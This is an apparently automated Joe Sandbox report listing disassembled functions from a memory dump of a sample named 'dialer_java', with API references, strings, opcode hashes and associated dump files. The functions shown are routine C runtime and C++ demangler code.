Similarity

API ID: fputwc
String ID:
API String ID: 761389786-0
Opcode ID: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction ID: 4736851dfbed467e33ac04a28c14ecacf4d5c02325731c5bf687ecedd3ece80d
Opcode Fuzzy Hash: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction Fuzzy Hash: F1E15373B3824287E7788A1EE15673A7BD1EB54B40F005139DB9BD6691DE2FE880C709

Function 00007FF6E3A6F9C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A6FAD8
realloc.MSVCRT ref: 00007FF6E3A6FB7A
malloc.MSVCRT ref: 00007FF6E3A6FCAA
malloc.MSVCRT ref: 00007FF6E3A6FD21
memcpy.MSVCRT ref: 00007FF6E3A6FD3C

Strings

auto, xrefs: 00007FF6E3A6FD04

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID: auto
API String ID: 2642181057-1723475450
Opcode ID: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction ID: 330ba64c93ea8768494a5ed5a25ef03c0c8bba49a7106efedfb329d5420e9665
Opcode Fuzzy Hash: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction Fuzzy Hash: F6A1FF6371AA8281EB248B2CE4493A97B95EF04B94F444236CBAD973D1EF7DE0958305

Function 00007FF6E3A81280 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF6E3A81451

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction ID: c55ada0590260f7c07f10017a6ce59509778d252e6eefa4004c3a4875cd5baee
Opcode Fuzzy Hash: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction Fuzzy Hash: 4871E663F081C246F7798A1EE14A77D6ED1EB14754F045130CE6EA6AC2DE3EE8C18706

Function 00007FF6E3A7DEF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7DF1C
realloc.MSVCRT ref: 00007FF6E3A7DFE8
realloc.MSVCRT ref: 00007FF6E3A7E042
realloc.MSVCRT ref: 00007FF6E3A7E0A3

Strings

noexcept, xrefs: 00007FF6E3A7DFFD
imaginary, xrefs: 00007FF6E3A7DF7E

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$malloc
String ID: imaginary$noexcept
API String ID: 454241450-3971218317
Opcode ID: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction ID: 5991dd6899524effe99664c2f33d8b0676b641b5a94ae95e99524a6e6f95a6a8
Opcode Fuzzy Hash: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction Fuzzy Hash: 9251B1B3B05B8282EB288F19E4847AD77A0EB54B84F048535DB8D577A5EF3DD592C300

Function 00007FF6E3A616B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6E3A61843
_assert.MSVCRT ref: 00007FF6E3A6185D
_assert.MSVCRT ref: 00007FF6E3A61877

Part of subcall function 00007FF6E3A64BC0: fflush.MSVCRT ref: 00007FF6E3A64C0E

Part of subcall function 00007FF6E3A64CA0: fflush.MSVCRT ref: 00007FF6E3A64CE3

Strings

results.reason == _URC_HANDLER_FOUND, xrefs: 00007FF6E3A61849, 00007FF6E3A61863
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6E3A61836, 00007FF6E3A61850, 00007FF6E3A6186A
actions & _UA_CLEANUP_PHASE, xrefs: 00007FF6E3A6182F

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assert$fflush
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & _UA_CLEANUP_PHASE$results.reason == _URC_HANDLER_FOUND
API String ID: 289967094-1554099779
Opcode ID: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction ID: b9a6adf03be880b4499c38879f6d8ae63f5c9a84dd5e46bf30760477b1e6cc33
Opcode Fuzzy Hash: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction Fuzzy Hash: 9A41D022F2C68241EE718B4EF1423B97E91AB95790F041139DE0DE7B84DE2EE5C1834A

Function 00007FF6E3A7EB50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7EB8E
realloc.MSVCRT ref: 00007FF6E3A7EBEA
realloc.MSVCRT ref: 00007FF6E3A7EC45
realloc.MSVCRT ref: 00007FF6E3A7ECA6

Strings

tInt, xrefs: 00007FF6E3A7EBFF
unsigned, xrefs: 00007FF6E3A7EBA3

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: tInt$unsigned
API String ID: 471065373-1789806510
Opcode ID: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction ID: 36bf3f96530e79a9c50009bc15ccfd2228f19ea971f2693f10750e51f17734d0
Opcode Fuzzy Hash: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction Fuzzy Hash: D0418FB3A06B8282DA258F4AF45476DB7A1EBA4BC0F04C531CB8E57794EF3DE4818341

Function 00007FF6E3A712D2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6E3A70B79
malloc.MSVCRT ref: 00007FF6E3A71396
memcpy.MSVCRT ref: 00007FF6E3A713B5

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocmemcpystrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3344349799-3503049562
Opcode ID: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction ID: 1a7685b355084759f80998128cbb57e36b134bbff34fc4aa5dbaf8b5ed7fcaab
Opcode Fuzzy Hash: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction Fuzzy Hash: 86419023719B4682EA60DB1DA44637E6BA4EB407C0F440035DB8EA7BA5EF3DE185C346

Function 00007FF6E3A7F160 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7F1A9
realloc.MSVCRT ref: 00007FF6E3A7F1F5
realloc.MSVCRT ref: 00007FF6E3A7F277
_assert.MSVCRT ref: 00007FF6E3A7F2C8

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h, xrefs: 00007FF6E3A7F2BB
CurrentPosition, xrefs: 00007FF6E3A7F2B4

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h$CurrentPosition
API String ID: 940201557-3339543485
Opcode ID: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction ID: d4e78ed92cc4dc856d728eac3bca37cdb2df58ac08df4858778e45f2d33ceb4a
Opcode Fuzzy Hash: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction Fuzzy Hash: AF4190B7B05F8282EF29CF5AE4853796B61EB58B80F048532CB8E57794DF2DE5818205

Function 00007FF6E3A88410 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A8842F
wcscpy.MSVCRT ref: 00007FF6E3A88490
wcscat.MSVCRT ref: 00007FF6E3A8849B
wcslen.MSVCRT ref: 00007FF6E3A884AC

Strings

0, xrefs: 00007FF6E3A884D9
@, xrefs: 00007FF6E3A884E1
, xrefs: 00007FF6E3A8850B

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: $0$@
API String ID: 468205783-2347541974
Opcode ID: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction ID: 7d20ae6084ba75f44562bb0b2d86bf0645bd280eb7ee92d11a6faa314cb2a448
Opcode Fuzzy Hash: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction Fuzzy Hash: DF418163A2C7C281F300DB19E40A379BBA0EBA5744F000136E6CDA2665DF7ED185CB0A

Function 00007FF6E3A7B364 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B3E6
memcpy.MSVCRT ref: 00007FF6E3A7B400
_assert.MSVCRT ref: 00007FF6E3A7B42A

Strings

basic_string, xrefs: 00007FF6E3A7B364
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A7B41D
starts_with(SV, "basic_"), xrefs: 00007FF6E3A7B416

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basic_string$starts_with(SV, "basic_")
API String ID: 2326172077-800580732
Opcode ID: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction ID: 91924d82b90586ecce52c0b498c9a7d97d85c4bf6b503b26b8cf01adae87d17a
Opcode Fuzzy Hash: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction Fuzzy Hash: 4601ADA3F05B8282EA189B0DF4863B96B61EF547C4F408431CA4DA7795EE2EE1C18306

Function 00007FF6E3A7AA50 Relevance: 9.3, APIs: 6, Instructions: 291stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7AB61
malloc.MSVCRT ref: 00007FF6E3A7AC3F
malloc.MSVCRT ref: 00007FF6E3A7ACD3
strlen.MSVCRT ref: 00007FF6E3A7AD56
malloc.MSVCRT ref: 00007FF6E3A7AD7D
realloc.MSVCRT ref: 00007FF6E3A7AE58

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction ID: 6eecc63723c8389a21216b084c93a73cbba264d8544dad0f98453af1edd1f8de
Opcode Fuzzy Hash: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction Fuzzy Hash: 1FC11563709BC181EB158F28D0953AD7BA5EB44B81F088231DB9D973DAEF2DE592C305

Function 00007FF6E3A78DB0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A78DEE
realloc.MSVCRT ref: 00007FF6E3A78E72
realloc.MSVCRT ref: 00007FF6E3A78ECD
realloc.MSVCRT ref: 00007FF6E3A78F2B
realloc.MSVCRT ref: 00007FF6E3A78F7C
memcpy.MSVCRT ref: 00007FF6E3A78F96

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction ID: 7cbbfa903142f6cb9850daaba303b122f285cd719e09d48c4efdf0a57b92e0d1
Opcode Fuzzy Hash: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction Fuzzy Hash: 145191B3B05B8682DF248F4AE485379A765EB54BC4F048532CB8E57794DF3DE0828301

Function 00007FF6E3A75E30 Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A75E78
memcpy.MSVCRT ref: 00007FF6E3A75E96
realloc.MSVCRT ref: 00007FF6E3A75ED8
realloc.MSVCRT ref: 00007FF6E3A75F35
realloc.MSVCRT ref: 00007FF6E3A75F87
realloc.MSVCRT ref: 00007FF6E3A75FE8

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction ID: 748e61f69fe09d27e410122c37dc6c8f81da15d25cc502e1df728e21743275e2
Opcode Fuzzy Hash: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction Fuzzy Hash: C4517FB3B06B8283DA249F5AE494369B7A5FB58BC0F448535CB8E57795EF3DE0818304

Function 00007FF6E3A76030 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A76078
memcpy.MSVCRT ref: 00007FF6E3A76096
realloc.MSVCRT ref: 00007FF6E3A760D1
realloc.MSVCRT ref: 00007FF6E3A76155
realloc.MSVCRT ref: 00007FF6E3A761AB
memcpy.MSVCRT ref: 00007FF6E3A761C5

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction ID: 2df0e1fdb261e9cc4d6fa6fffe6a39bb8769154600b7dea3044deb160a390f9f
Opcode Fuzzy Hash: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction Fuzzy Hash: CE5190B3B05B8683DE288F0AE49436DA761EB59BC4F048531CB8E577A5EF3DE0918304

Function 00007FF6E3A64F64 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6E3A64F78
TlsGetValue.KERNEL32 ref: 00007FF6E3A64FAF
GetLastError.KERNEL32 ref: 00007FF6E3A64FB4
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A65072
free.MSVCRT ref: 00007FF6E3A65094
DeleteCriticalSection.KERNEL32 ref: 00007FF6E3A650BD

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction ID: 006746aa31af3d7caff7aa88500433000a92f6b519bb34d39658a798ac3280d8
Opcode Fuzzy Hash: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction Fuzzy Hash: 4F210766B19A0385E6559B09E8023347A60BF62F90F450035C84EF36A0CF2FE8C6878A

Function 00007FF6E3A7ED80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7EDB1
realloc.MSVCRT ref: 00007FF6E3A7EE68
realloc.MSVCRT ref: 00007FF6E3A7EEFF

Strings

pixel ve, xrefs: 00007FF6E3A7EE8C
vector[, xrefs: 00007FF6E3A7EE7D

Memory Dump Source

